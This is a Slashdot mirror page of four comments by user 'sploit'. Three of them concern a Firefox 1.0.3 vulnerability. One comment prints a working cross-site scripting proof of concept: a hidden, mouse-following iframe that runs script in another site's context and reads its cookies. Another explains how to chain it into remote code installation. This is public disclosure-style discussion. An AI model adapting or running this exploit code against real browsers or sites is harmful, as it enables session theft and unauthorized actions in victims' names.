Slashdot Mirror


User: sploit

sploit's activity in the archive.

Stories
0
Comments
4
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 4

  1. Re:heres an Idea on NY Times Op-Ed Page Goes Subscriber-Only · · Score: 1

    That's the dilemma of online advertising. Since there is a way to measure some form of success (direct clickthroughs), the rest of the advertising potential is pretty much ignored. Somehow the notion that advertising offers more indirect forms of increasing business died with the dotcom bubble, and with it died reasonable per-contact pricing for online advertising space, driving publishers to subscription models.

  2. Re:Are you sure? on New Mozilla Firefox 1.0.3 Exploit · · Score: 1

    FYI: That change breaks the published exploit, but the exploit can be modified (quite easily, I might add) to inject arbitrary code into a trusted site.

  3. Re:gah on New Mozilla Firefox 1.0.3 Exploit · · Score: 2, Informative

    There are two independent bugs which are combined in the demo exploit. The cross site scripting part does not require any whitelist privilege whatsoever. If you're using login cookies, you're vulnerable. It is entirely possible to write an exploit which orders stuff from online stores, in your name and from your IP address. Combined with the cross site scripting bug, the whitelist requirement of the remote execution bug is moot, because a site can simply inject code into one of the standard whitelisted sites. The temporary fix on UMO breaks the published exploit, but there is no reason why an exploit couldn't simply inject its own call to InstallTrigger.install into one of these sites. This is a VERY dangerous combination of bugs. There will be exploits. The only way to escape both bugs is to turn off Javascript. Turning off software installation just prevents the remote execution, not the cross site scripting.

  4. Re:This was reported to bugzilla some time ago! on New Mozilla Firefox 1.0.3 Exploit · · Score: 1

    It's out there, so anything goes, right?

    <html><body>Click anywhere.<script
    language="JavaScript" type="text/javascript">
    url='http://slashdot.org' ;function l(){c++;if
    (c==1)sc.focus();else if(c==2){sc.history.go(
    -1)}}f = '<iframe onload="l()" src="javascri';
    f+= 'pt:\'<noscript>\'+eval(\'if (window.nam';
    f+= 'e!=\\\'sc\\\'){window.name=\\\'sc\\\';}';
    f+= 'else{alert(document.cookie);}\')+\'</no';
    f+= 'script><a href=\\\''+url+'\\\' style=\\';
    f+= '\'cursor:default;\\\'>&nbsp;&nbsp;&nbsp';
    f+= ';</\'+\'a>\'" id="targetframe" scrollin';
    f+= 'g="no" frameborder="0" marginwidth="0" ';
    f+= 'marginheight="0" style="position:absolu';
    f+= 'te;left:0px;height:6px;width:6px;margin';
    f+= ':0px; padding:0px; -moz-opacity:0;"></i';
    f+= 'frame>';document.write(f);
    document.onmousemove= function(e){
    document.getElementById("target"+ "frame").style.left=(e.pageX-3)+ "px";
    document.getElementById("target" +"frame").style.top= (e.pageY-3)+"px"};
    c=0;</script></body></html>